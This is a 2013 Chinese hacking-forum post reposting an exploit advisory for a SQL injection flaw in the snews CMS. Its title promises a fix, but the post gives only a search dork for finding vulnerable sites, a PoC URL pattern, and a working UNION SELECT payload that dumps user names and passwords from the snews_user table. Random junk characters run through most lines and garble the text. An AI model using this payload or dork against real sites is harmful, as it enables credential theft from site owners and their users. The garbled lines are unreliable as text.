找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2007|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability% ~. d& H& W; ^& v, ^# m
作者: By onestree3 ?! W5 \" [6 H- h
下载地址 : http://snewscms.com/5 q8 Z- u, X# F4 Z
测试平台 : ubuntu 12.10 / win 70 f0 L/ C' T: g0 s9 a+ M
关键词: inurl:"tanyakan pada rumput yang bergoyang"0 U% ~; f/ i0 ?# I8 l
' W! G$ `! x8 k: ^

; m+ |, K5 W9 V  f0 r*************************************************************
+ p7 p2 ^: Y1 y% O% ^" Q* V
2 J9 X8 V/ n  c+ a1 [SQL poc:1 ?. T* z5 S2 Q1 s8 [8 \
! B7 T8 [, s# Q) g' W
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]" B; U* H4 c4 G- I  c* W
, E- v% H9 z8 w7 u& L" d
示例
9 ]4 Q5 ~  T$ I. V( W* O 9 P" K6 I) u& |
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*! h3 H, v' \* K; H5 i5 Q: e( V
% \2 O* [; a7 P2 d

8 @" {1 G1 g  _, w% @; Z致谢:
/ P- m. }) z; l, o2 z
# c) |* s% w! s7 W/ V  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell4 J/ t, W4 K0 w" a+ @+ i0 L; \/ p) U" J
     6 @5 q* Y7 `+ ?
          indonesiancoder - moeslimh4x0r - go-coder/ v' s8 L  L8 d' f5 n
7 U2 T2 d* Z, }2 l" p, n
spesial my hunny :*
, V8 Q* n% m: C9 r$ I, O6 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表